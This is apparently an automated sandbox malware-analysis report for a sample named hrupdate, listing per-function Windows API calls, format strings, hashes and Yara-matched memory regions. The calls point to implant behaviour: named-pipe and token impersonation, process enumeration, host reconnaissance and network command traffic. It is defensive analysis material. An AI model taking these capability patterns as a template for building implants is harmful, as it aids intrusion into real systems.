                                      • Opcode ID: 589e3b946b326a213d4398395d5a4a76cdec11e31719adc70cc6f86360464dbb
                                      • Instruction ID: d9c681dbf20f4a5a32e6981efed085aa9c8399d8eb2984a7a34d40883d5f65e3
                                      • Opcode Fuzzy Hash: 589e3b946b326a213d4398395d5a4a76cdec11e31719adc70cc6f86360464dbb
                                      • Instruction Fuzzy Hash: 5A52E375A001199FDB48CF69C491AADBBF1EF8D300F14C16AE865AB342D638E951CFA4
                                      APIs
                                      • CreateNamedPipeA.KERNEL32(?,00000003,00000004,00000002,00000000,00000000,00000000,00000000), ref: 046988F9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateNamedPipe
                                      • String ID:
                                      • API String ID: 2489174969-0
                                      • Opcode ID: 7e470d41ff7f4ecef460ff3326896921b70e676bb5c1fc7d5176bfa38c013841
                                      • Instruction ID: 1b36b2448f3ba59b15b1ac194b6a9cd96d63b68f1aa23ae3d608c75ac6c4d310
                                      • Opcode Fuzzy Hash: 7e470d41ff7f4ecef460ff3326896921b70e676bb5c1fc7d5176bfa38c013841
                                      • Instruction Fuzzy Hash: 96F0C8B1901308AFEB10AE79ECC6EA63FECD301368F105329E2A5D21D1F2B95E954E55
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(Function_000037EE,00672EF1), ref: 006737E7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896617863.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000000.00000002.3896582194.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896648026.0000000000674000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896669818.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896684082.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896684082.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_670000_hrupdate.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: 6d83936a5cac999094e381013522a0316588b0eb75638898f96f2eb3d9c08fa0
                                      • Instruction ID: e816ec5407db5c66093fbdab87839a89d5dd311e9e037b9041c27011566325c2
                                      • Opcode Fuzzy Hash: 6d83936a5cac999094e381013522a0316588b0eb75638898f96f2eb3d9c08fa0
                                      • Instruction Fuzzy Hash:
                                      Memory Dump Source
                                      • Source File: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_3_f30000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2095bdf26c649b4205d96464923c7056190beb180ab0ce64cd05bb6d2762ada8
                                      • Instruction ID: f3ea1702f16f66b654406b2db58bf769a7b374e6192fb745449aff962af0302e
                                      • Opcode Fuzzy Hash: 2095bdf26c649b4205d96464923c7056190beb180ab0ce64cd05bb6d2762ada8
                                      • Instruction Fuzzy Hash: 935190B4E00219DFCB08CF98C490AEEBBB1FF48314F248199D915A7355D335AA41DFA4
                                      Memory Dump Source
                                      • Source File: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_3_f30000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2095bdf26c649b4205d96464923c7056190beb180ab0ce64cd05bb6d2762ada8
                                      • Instruction ID: ca775c2d2ae5e55d2f098c1ef13b4c81aba538394422430142d7cbee6581e8b3
                                      • Opcode Fuzzy Hash: 2095bdf26c649b4205d96464923c7056190beb180ab0ce64cd05bb6d2762ada8
                                      • Instruction Fuzzy Hash: CC518E74E0421A9FCB04CF98C590AAEFBB2FF88314F248199D915BB355D334AA51DFA4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _malloc
                                      • String ID:
                                      • API String ID: 1579825452-0
                                      • Opcode ID: 60347157e8862350854cb8fdef7e5684c47df712c36dee72f341f05ac62c99b7
                                      • Instruction ID: f8b4f33ff3c25f901edc1ae847d9a93088ba89c2733969efea3bd651abded616
                                      • Opcode Fuzzy Hash: 60347157e8862350854cb8fdef7e5684c47df712c36dee72f341f05ac62c99b7
                                      • Instruction Fuzzy Hash: CF410AB2E00209AFDB14DFA8C881AAEB7B5EF48314F15816DE956E7341E634BD51CF50
                                      APIs
                                      • htonl.WS2_32(0469489E), ref: 0469D93C
                                      • select.WS2_32(00000000,?,?,?,?), ref: 0469D9A0
                                      • __WSAFDIsSet.WS2_32(34E85900,?), ref: 0469D9BC
                                      • accept.WS2_32(34E85900,00000000,00000000), ref: 0469D9D1
                                      • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 0469D9E4
                                        • Part of subcall function 0469D308: _malloc.LIBCMT ref: 0469D30F
                                        • Part of subcall function 0469D308: GetTickCount.KERNEL32 ref: 0469D32F
                                        • Part of subcall function 046958BF: _malloc.LIBCMT ref: 046958C5
                                        • Part of subcall function 0469590F: htonl.WS2_32(00000000), ref: 04695915
                                        • Part of subcall function 04695A58: _memset.LIBCMT ref: 04695A66
                                      • __WSAFDIsSet.WS2_32(34E85900,?), ref: 0469DA71
                                      • accept.WS2_32(34E85900,00000000,00000000), ref: 0469DA83
                                      • closesocket.WS2_32(0469489E), ref: 0469DB91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _mallocaccepthtonl$CountTick_memsetclosesocketioctlsocketselect
                                      • String ID: d
                                      • API String ID: 4083423528-2564639436
                                      APIs
                                      • _memset.LIBCMT ref: 04696DE4
                                      • _memset.LIBCMT ref: 04696DF9
                                      • __snprintf.LIBCMT ref: 04696E65
                                      • _memset.LIBCMT ref: 04696E73
                                      • __snprintf.LIBCMT ref: 04696E8F
                                      • __snprintf.LIBCMT ref: 04696EAE
                                      • __snprintf.LIBCMT ref: 04696F4C
                                      • __snprintf.LIBCMT ref: 04696F63
                                      • HttpOpenRequestA.WININET(00000000,?,00000000,00000000,*/*,046DA668), ref: 04696FA0
                                      • HttpSendRequestA.WININET(00000000,?,?,?,?), ref: 04696FC9
                                      • InternetCloseHandle.WININET(00000000), ref: 04696FDB
                                      • Sleep.KERNEL32(000001F4), ref: 04696FE2
                                      • InternetCloseHandle.WININET(00000000), ref: 04696FF3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __snprintf$_memset$CloseHandleHttpInternetRequest$OpenSendSleep
                                      • String ID: %s%s$*/*
                                      • API String ID: 3375730287-856325523
                                      APIs
                                      • _memset.LIBCMT ref: 04698EC3
                                      • _memset.LIBCMT ref: 04698EDF
                                        • Part of subcall function 04697635: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000400,046990F0,?,04698F09,046990F0,?,00000400), ref: 0469764B
                                        • Part of subcall function 04697635: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,046990F0,04698F09,?,04698F09,046990F0,?,00000400,?,?,?,?,046990F0), ref: 04697664
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,046990F0,0469E106,?,?,0469E106,?), ref: 04698F29
                                      • GetCurrentDirectoryW.KERNEL32(00000400,?,?,?,?,?,?,?,?,046990F0,0469E106,?,?,0469E106,?), ref: 04698F38
                                      • CreateProcessWithTokenW.ADVAPI32(00000002,00000000,?,C0330CC4,00000000,?,C2E8296A,83FFFFD9), ref: 04698F6B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharCurrentDirectoryMultiWide_memset$CreateProcessTokenWith
                                      • String ID: sysnative$system32
                                      • API String ID: 2486443368-2461298002
                                      APIs
                                      • _memset.LIBCMT ref: 0469F339
                                        • Part of subcall function 046958BF: _malloc.LIBCMT ref: 046958C5
                                      • GetCurrentProcess.KERNEL32 ref: 0469F384
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0469F3B9
                                      • Process32First.KERNEL32(00000000,?), ref: 0469F3DB
                                        • Part of subcall function 0469590F: htonl.WS2_32(00000000), ref: 04695915
                                      • Process32Next.KERNEL32(00000000,00000128), ref: 0469F4BE
                                        • Part of subcall function 0469F2AA: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 0469F2B7
                                      • ProcessIdToSessionId.KERNEL32(?,?,?,00000002,00000000), ref: 0469F463
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process$Process32$CreateCurrentFirstNextOpenSessionSnapshotTokenToolhelp32_malloc_memsethtonl
                                      • String ID: %s%d%d%s%s%d$%s%d%d$x64$x86
                                      • API String ID: 3674674043-1833344708
                                      APIs
                                      • _memset.LIBCMT ref: 046A2626
                                        • Part of subcall function 046A23B3: _memset.LIBCMT ref: 046A244F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _memset
                                      • String ID: 0-v$0.v$0/v$@Cv$P.v$`+v$p,v$p=v$/v
                                      • API String ID: 2102423945-2462229890
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 0469D712
                                      • select.WS2_32(00000000,00000000,?,?,00000000), ref: 0469D75D
                                      • __WSAFDIsSet.WS2_32(?,?), ref: 0469D76D
                                      • __WSAFDIsSet.WS2_32(?,?), ref: 0469D780
                                      • GetTickCount.KERNEL32 ref: 0469D789
                                      • gethostbyname.WS2_32(?), ref: 0469D794
                                      • htons.WS2_32(?), ref: 0469D7A7
                                      • inet_addr.WS2_32(?), ref: 0469D7B3
                                      • sendto.WS2_32(?,00000000,?,00000000,?,00000010), ref: 0469D7CD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CountTick$gethostbynamehtonsinet_addrselectsendto
                                      • String ID: d
                                      • API String ID: 1257931466-2564639436
                                      APIs
                                        • Part of subcall function 0469CF5F: _malloc.LIBCMT ref: 0469CF65
                                        • Part of subcall function 0469CF5F: _malloc.LIBCMT ref: 0469CF75
                                      • _memset.LIBCMT ref: 046A12EC
                                        • Part of subcall function 046A175D: _memset.LIBCMT ref: 046A1859
                                      • _malloc.LIBCMT ref: 046A12FA
                                        • Part of subcall function 046AEA1B: __FF_MSGBANNER.LIBCMT ref: 046AEA3E
                                        • Part of subcall function 046AEA1B: __NMSG_WRITE.LIBCMT ref: 046AEA45
                                        • Part of subcall function 046AEA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 046AEA92
                                      • _memset.LIBCMT ref: 046A130C
                                        • Part of subcall function 046A4B98: _malloc.LIBCMT ref: 046A4BBF
                                        • Part of subcall function 046A4B98: _memset.LIBCMT ref: 046A4BED
                                        • Part of subcall function 046A1871: _memset.LIBCMT ref: 046A1950
                                      • _malloc.LIBCMT ref: 046A132F
                                      • _memset.LIBCMT ref: 046A1341
                                        • Part of subcall function 046A4B98: _realloc.LIBCMT ref: 046A4BCE
                                      • htonl.WS2_32(00000000), ref: 046A1372
                                      • GetComputerNameExA.KERNEL32(00000006,?,?), ref: 046A13DB
                                      • GetComputerNameA.KERNEL32(0469F6FF,?), ref: 046A1408
                                      • GetUserNameA.ADVAPI32(?,?), ref: 046A1435
                                        • Part of subcall function 04697388: WSASocketA.WS2_32(00000002,00000002,00000000,00000000,00000000,00000000), ref: 046973AC
                                      • _malloc.LIBCMT ref: 046A1504
                                      • _memset.LIBCMT ref: 046A1591
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _memset$_malloc$Name$Computer$AllocateHeapSocketUser_reallochtonl
                                      • String ID:
                                      • API String ID: 2958771099-0
                                      APIs
                                      • htonl.WS2_32 ref: 046A4290
                                      • htonl.WS2_32(?), ref: 046A42A0
                                      • GetLastError.KERNEL32 ref: 046A42CC
                                      • OpenProcessToken.ADVAPI32(00000000,00000000,00000008), ref: 046A42F0
                                      • GetLastError.KERNEL32 ref: 046A42FA
                                      • ImpersonateLoggedOnUser.ADVAPI32(00000008), ref: 046A4319
                                      • GetLastError.KERNEL32 ref: 046A431F
                                      • DuplicateTokenEx.ADVAPI32(00000008,02000000,00000000,00000003,00000001,046DAF5C), ref: 046A433E
                                      • GetLastError.KERNEL32 ref: 046A4348
                                      • ImpersonateLoggedOnUser.ADVAPI32 ref: 046A435A
                                      • GetLastError.KERNEL32 ref: 046A4360
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$ImpersonateLoggedTokenUserhtonl$DuplicateOpenProcess
                                      • String ID:
                                      • API String ID: 332438066-0
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 0469C75D
                                      • GetTickCount.KERNEL32 ref: 0469C767
                                      • GetLastError.KERNEL32 ref: 0469C7C1
                                        • Part of subcall function 046A3BBA: _memset.LIBCMT ref: 046A3C43
                                      • GetLastError.KERNEL32 ref: 0469C783
                                      • WaitNamedPipeA.KERNEL32(?,00002710), ref: 0469C798
                                        • Part of subcall function 0469C387: _memset.LIBCMT ref: 0469C3A8
                                      • Sleep.KERNEL32(000003E8), ref: 0469C7A5
                                      • GetTickCount.KERNEL32 ref: 0469C7AB
                                      • GetLastError.KERNEL32 ref: 0469C7D1
                                      • SetNamedPipeHandleState.KERNEL32(?,?,00000000,00000000), ref: 0469C7EE
                                      • GetLastError.KERNEL32 ref: 0469C7F8
                                      • DisconnectNamedPipe.KERNEL32(?), ref: 0469C832
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$CountNamedPipeTick$_memset$DisconnectHandleSleepStateWait
                                      • String ID:
                                      • API String ID: 3382687554-0
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 0469D64C
                                      • select.WS2_32(00000000,00000000,?,?,00000000), ref: 0469D69A
                                      • __WSAFDIsSet.WS2_32(?,?), ref: 0469D6AA
                                      • __WSAFDIsSet.WS2_32(?,?), ref: 0469D6BD
                                      • send.WS2_32(?,00000000,?,00000000), ref: 0469D6D1
                                      • WSAGetLastError.WS2_32(?,00000000,?,00000000,?,?,?,?), ref: 0469D6DB
                                      • Sleep.KERNEL32(000003E8), ref: 0469D6ED
                                      • GetTickCount.KERNEL32 ref: 0469D6F3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CountTick$ErrorLastSleepselectsend
                                      • String ID: d
                                      • API String ID: 2152284305-2564639436
                                      APIs
                                      • _memset.LIBCMT ref: 0469A9D6
                                      • _memset.LIBCMT ref: 0469A9E2
                                        • Part of subcall function 0469AB4C: _malloc.LIBCMT ref: 0469AB9E
                                        • Part of subcall function 0469AB4C: _malloc.LIBCMT ref: 0469ABA9
                                        • Part of subcall function 0469AB4C: _memset.LIBCMT ref: 0469ABB5
                                        • Part of subcall function 0469AB4C: _memset.LIBCMT ref: 0469ABC0
                                        • Part of subcall function 0469AB4C: _rand.LIBCMT ref: 0469AC1E
                                      • __snprintf.LIBCMT ref: 0469AA33
                                      • __snprintf.LIBCMT ref: 0469AA4B
                                      • _memset.LIBCMT ref: 0469AA6A
                                      • _memset.LIBCMT ref: 0469AA75
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _memset$__snprintf_malloc$_rand
                                      • String ID: %s&%s$?%s
                                      • API String ID: 1876596931-1750478248
                                      APIs
                                      • htonl.WS2_32 ref: 0469D54F
                                      • htons.WS2_32(00000000), ref: 0469D560
                                      • socket.WS2_32(00000002,00000001,00000000), ref: 0469D599
                                      • closesocket.WS2_32(00000000), ref: 0469D5A8
                                      • gethostbyname.WS2_32(00000000), ref: 0469D5C6
                                      • htons.WS2_32(?), ref: 0469D5F2
                                      • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0469D605
                                      • connect.WS2_32(00000000,?,00000010), ref: 0469D616
                                      • WSAGetLastError.WS2_32(00000000,?,00000010), ref: 0469D61F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: htons$ErrorLastclosesocketconnectgethostbynamehtonlioctlsocketsocket
                                      • String ID:
                                      • API String ID: 3339321253-0
                                      APIs
                                        • Part of subcall function 0469CF5F: _malloc.LIBCMT ref: 0469CF65
                                        • Part of subcall function 0469CF5F: _malloc.LIBCMT ref: 0469CF75
                                      • _memset.LIBCMT ref: 04699203
                                      • GetStartupInfoA.KERNEL32(?), ref: 0469921B
                                        • Part of subcall function 04697635: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000400,046990F0,?,04698F09,046990F0,?,00000400), ref: 0469764B
                                        • Part of subcall function 04697635: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,046990F0,04698F09,?,04698F09,046990F0,?,00000400,?,?,?,?,046990F0), ref: 04697664
                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 04699280
                                      • GetCurrentDirectoryW.KERNEL32(00000400,?), ref: 0469928A
                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000001,00000000,00000000,00000000,00000000,00000000,?,0469773C), ref: 046992B5
                                      • GetLastError.KERNEL32 ref: 046992C4
                                        • Part of subcall function 04696B06: _vswprintf_s.LIBCMT ref: 04696B22
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharCurrentDirectoryMultiWide_malloc$CreateErrorInfoLastLogonProcessStartupWith_memset_vswprintf_s
                                      • String ID: %s as %s\%s: %d
                                      • API String ID: 963358868-816037529
                                      APIs
                                      • _memset.LIBCMT ref: 046A40DE
                                      • _memset.LIBCMT ref: 046A40EC
                                      • _memset.LIBCMT ref: 046A40FA
                                      • GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),?,00001000,?), ref: 046A4117
                                      • LookupAccountSidA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 046A4146
                                      • __snprintf.LIBCMT ref: 046A4168
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _memset$AccountInformationLookupToken__snprintf
                                      • String ID: %s\%s
                                      • API String ID: 2009363630-4073750446
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: htonl$__vscwprintf_helper_malloc_memset_vswprintf_s_vwprintf
                                      • String ID: 9
                                      • API String ID: 1612592715-2366072709
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Similarity
                                      • API ID: CountErrorLastSleepTick$BuffersDisconnectFileFlushNamedPipe
                                      • String ID:
                                      • API String ID: 3377695601-0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Similarity
                                      • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                      • String ID:
                                      • API String ID: 3886058894-0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Similarity
                                      • API ID: _memset$_malloc$_rand
                                      • String ID:
                                      • API String ID: 2453798774-0
                                      APIs
                                      • __time64.LIBCMT ref: 046A1BC8
                                        • Part of subcall function 046AEC25: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,046A1BCD,00000000,00000080,00000000,00000000,?,?,?,046945CD,?,00000000,00000000), ref: 046AEC30
                                        • Part of subcall function 046AEC25: __aulldiv.LIBCMT ref: 046AEC50
                                        • Part of subcall function 046AEFA9: __getptd.LIBCMT ref: 046AEFAE
                                      • _malloc.LIBCMT ref: 046A1C0F
                                      • _memset.LIBCMT ref: 046A1C1C
                                      • _strtok.LIBCMT ref: 046A1C36
                                      • _strncpy.LIBCMT ref: 046A1C6E
                                      • _strncpy.LIBCMT ref: 046A1C96
                                      • _strtok.LIBCMT ref: 046A1CA2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Similarity
                                      • API ID: Time_strncpy_strtok$FileSystem__aulldiv__getptd__time64_malloc_memset
                                      • String ID:
                                      • API String ID: 3612108075-0
                                      APIs
                                      • GetLastError.KERNEL32 ref: 046A47E8
                                      • OpenProcessToken.ADVAPI32(00000000,?,00000000), ref: 046A4806
                                      • GetLastError.KERNEL32 ref: 046A4810
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Similarity
                                      • API ID: ErrorLast$OpenProcessToken
                                      • String ID:
                                      • API String ID: 2009710997-0
                                      APIs
                                      • _memset.LIBCMT ref: 0469AAA0
                                      • _memset.LIBCMT ref: 0469AAAC
                                        • Part of subcall function 0469AB4C: _malloc.LIBCMT ref: 0469AB9E
                                        • Part of subcall function 0469AB4C: _malloc.LIBCMT ref: 0469ABA9
                                        • Part of subcall function 0469AB4C: _memset.LIBCMT ref: 0469ABB5
                                        • Part of subcall function 0469AB4C: _memset.LIBCMT ref: 0469ABC0
                                        • Part of subcall function 0469AB4C: _rand.LIBCMT ref: 0469AC1E
                                      • __snprintf.LIBCMT ref: 0469AB08
                                      • _memset.LIBCMT ref: 0469AB26
                                      • _memset.LIBCMT ref: 0469AB31
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Similarity
                                      • API ID: _memset$_malloc$__snprintf_rand
                                      • String ID: %s%s
                                      • API String ID: 4266533377-3438391663
                                      APIs
                                      • _memset.LIBCMT ref: 04698757
                                      • GetLastError.KERNEL32 ref: 0469876A
                                      • ConnectNamedPipe.KERNEL32(00000000), ref: 0469877E
                                      • ImpersonateNamedPipeClient.ADVAPI32 ref: 046987A9
                                      • GetCurrentThread.KERNEL32 ref: 046987BE
                                      • OpenThreadToken.ADVAPI32(00000000), ref: 046987C5
                                      • DisconnectNamedPipe.KERNEL32(046CE194), ref: 046987D9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Similarity
                                      • API ID: NamedPipe$Thread$ClientConnectCurrentDisconnectErrorImpersonateLastOpenToken_memset
                                      • String ID:
                                      • API String ID: 3598867581-0
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 0469C9F1
                                      • ioctlsocket.WS2_32(?,8004667E,?), ref: 0469CA15
                                      • GetTickCount.KERNEL32 ref: 0469CA4C
                                      • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 0469CA71
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Similarity
                                      • API ID: CountTickioctlsocket
                                      • String ID:
                                      • API String ID: 3686034022-0
                                      APIs
                                      • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(string too long,00672864,00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00672A15
                                      • _Mtx_unlock.MSVCP140(?,A92820B5,?,00000000,00000000,00673E90,000000FF), ref: 00672A66
                                      • ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000), ref: 00672A74
                                      • _Mtx_destroy.MSVCP140(?), ref: 00672A7E
                                      • _Cnd_destroy.MSVCP140(?,?,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00672A88
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896617863.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000000.00000002.3896582194.0000000000670000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896648026.0000000000674000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896669818.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896684082.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.3896684082.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_670000_hrupdate.jbxd
                                      Similarity
                                      • API ID: C_error@std@@Cnd_destroyMtx_destroyMtx_unlockThrow_Xlength_error@std@@
                                      • String ID: string too long
